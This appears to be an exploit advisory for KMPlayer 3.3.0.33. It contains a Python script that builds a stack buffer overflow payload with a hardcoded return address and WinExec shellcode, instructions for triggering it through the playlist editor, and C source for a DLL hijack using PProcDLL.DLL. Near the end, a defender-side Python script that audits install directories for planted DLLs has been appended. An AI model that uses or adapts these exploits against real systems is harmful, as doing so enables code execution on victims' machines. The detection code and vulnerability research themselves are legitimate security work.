
# Title : KMPlayer v3.3.0.33 Multiple Vulnerabilities
# Published : 2012-11-04
# Author :


# Exploit Title: The KMPlayer v3.3.0.33 Multiple Vulnerabilities
# Date: October, 26, 2012
# Discovered By: Mr.XHat
# Exploit Author: Mr.XHat
# E-Mail: Mr.XHat {AT} Gmail.com
# Vendor: http://www.kmplayer.com/
# Version: 3.3.0.33
# Tested On: WinXP SP3 EN
#########################

# Buffer Overflow Vulnerability:

# Python 3: build the payload as raw bytes and write it in binary mode so the
# non-ASCII bytes in the return address and shellcode are not re-encoded.
junk = b"\x41" * 250                      # padding up to the saved return address
eip = b"\xD7\x30\x9D\x7C"                 # EIP overwrite (address as given by the author, WinXP SP3 EN)
shellcode = (
    b"\x31\xC9\x51\x68\x63\x61\x6C\x63"   # xor ecx,ecx ; push ecx ; push "calc"
    b"\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"   # push esp ; mov eax, WinExec ; call eax
)
exploit = junk + eip + shellcode
with open("Exploit.txt", "wb") as f:
    f.write(exploit)

# How To Do Exploit:
# First run KMPlayer and go to Playlist > Playlist Editor... > Add New Album, then paste the exploit code into "Album Name:"; your shellcode will now be executed!
############################################################################################################################################################

# DLL Hijacking Vulnerability:

# DLL Name: PProcDLL.DLL

# How To Do Hijack:
# First compile the source code below with a C compiler and rename the compiled DLL to PProcDLL.DLL, then copy it to the KMPlayer install path; now when you run KMPlayer the DLL will be hijacked!

#include <windows.h>

/* Pops a message box so the hijack is visible when KMPlayer loads the DLL.
   Defined before DllMain so it does not rely on an implicit declaration. */
static void dll_hijack(void)
{
    MessageBox(0, "DLL Hijacked!", "Mr.XHat", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            /* runs once, when the process maps the DLL */
            dll_hijack();
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
#
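# A defender-side check for the hijack described above, added here as an example (not part of the original
# advisory): it audits an application install directory against a baseline of shipped DLL hashes and flags a
# PProcDLL.DLL that is present but was never shipped. The directory contents, the file name KMPlayer.dll and the
# hashes are constructed for the demo.

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large DLLs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_install_dir(install_dir, baseline, watch=("pprocdll.dll",)):
    """Return {lowercase dll name: finding} for every DLL in install_dir.

    baseline: {lowercase dll name: expected sha256} for DLLs the installer ships.
    watch: names the application tries to load but does not ship; their mere
           presence in the install path is a planted-DLL indicator.
    """
    findings = {}
    for name in os.listdir(install_dir):
        lower = name.lower()
        if not lower.endswith(".dll"):
            continue
        digest = sha256_file(os.path.join(install_dir, name))
        if lower in baseline:
            if digest != baseline[lower]:
                findings[lower] = "modified"      # shipped DLL replaced or tampered
        elif lower in watch:
            findings[lower] = "planted"           # never shipped, but would be loaded
        else:
            findings[lower] = "unknown"           # not in baseline; review manually
    return findings


def demo():
    """Constructed install directory: one baseline DLL plus a planted PProcDLL.DLL."""
    d = tempfile.mkdtemp()
    good = os.path.join(d, "KMPlayer.dll")        # constructed name, not a real hash source
    with open(good, "wb") as f:
        f.write(b"MZ constructed legitimate module")
    with open(os.path.join(d, "PProcDLL.DLL"), "wb") as f:
        f.write(b"MZ constructed planted module")
    baseline = {"kmplayer.dll": sha256_file(good)}
    return audit_install_dir(d, baseline)
```

In practice the baseline comes from a clean install or the vendor's signed package, and the same check can be scheduled or run from an EDR script on the KMPlayer install path.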

# Enjoy!